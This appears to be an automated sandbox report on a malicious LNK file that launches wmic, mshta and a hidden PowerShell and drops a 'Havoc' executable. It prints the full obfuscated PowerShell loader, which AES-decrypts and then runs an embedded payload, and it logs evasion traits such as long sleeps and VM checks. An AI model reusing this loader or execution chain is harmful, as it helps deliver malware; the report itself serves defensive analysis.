Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: GYede3Gwn0.lnk | LNK file: ..\..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506065317.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487288240.0000025067FDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488031202.0000025067FB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2492202557.0000025067FB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486345717.000002506C091000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.2487826455.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509580306.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487826455.000002506BF79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2509837036.000002506BFBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487778308.000002506C028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486686135.0000025067F9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488052265.0000025067FA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2491766159.000002506BFBA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2496638200.0000025067FB7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2488150003.000002506C029000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487999626.0000025067FB6000.00000004.00000020.00020000.00000000.sdmp, Havoc[1].6.dr

Data Obfuscation

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
Source: Havoc[1].6.dr | Static PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
Source: Havoc[1].6.dr | Static PE information: real checksum: 0x1f597 should be: 0x7cff6
Source: Havoc[1].6.dr | Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD345400BD pushad ; iretd 5_2_00007FFD345400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD33177FEA push ebx; retf 0009h 9_2_00007FFD3317801A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD331700BD pushad ; iretd 9_2_00007FFD331700C1

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1507
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 886
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 885
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4977
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4733
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 Thread sleep count: 968 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552 Thread sleep count: 885 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3568 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: powershell.exe, 00000009.00000002.2474776375.0000021DB7E7B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000008.00000002.3415070129.000001549742B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: mshta.exe, 00000006.00000002.2508342660.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2486499146.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506163477.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2506268055.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487930786.0000024865346000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508521334.00000248653BB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3417918626.000001549CA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000006.00000003.2487930786.000002486532B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2487703916.000002486530D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.2508342660.000002486532C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
